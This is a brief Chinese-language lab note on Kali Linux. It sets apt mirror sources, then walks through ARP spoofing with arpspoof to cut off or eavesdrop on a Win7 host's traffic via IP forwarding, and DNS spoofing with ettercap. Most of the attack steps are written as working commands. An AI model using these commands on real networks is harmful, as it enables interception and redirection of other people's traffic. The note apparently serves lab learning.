kali换更新源
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
vim /etc/apt/sources.list
从上方随便找一个源添加进去
apt-get update
安装arpspoof
apt install dsniff
1.使用arpspoof实现断网攻击(kali 攻击机,win7受害主机)
arp欺骗成功后浏览器不能浏览网页
永久开启路由转发功能,就可以上网,但数据都经过kali,可以进行窃听
修改/etc/sysctl.conf,将net.ipv4.ip_forward=1的#去掉
sysctl -p生效
路由转发功能开启后可以上网
arpspoof -I eth0 -t 192.168.52.143 192.168.52.2
-l 表示是哪一个网卡 第一个ip表示攻击的目标 第二个ip表示伪造的网关
下面是攻击成功后的截图
2.dns欺骗 (kali 攻击机,win7受害主机)
ettercap -G
添加目标主机IP(targert)
找到对应扩展(plugin),manage plugins,并激活(activate)
修改/etc/ettercap/etter.dns 添加记录
目标主机要关闭防火墙,刷新dns缓存,欺骗成功
ipconfig /flushdns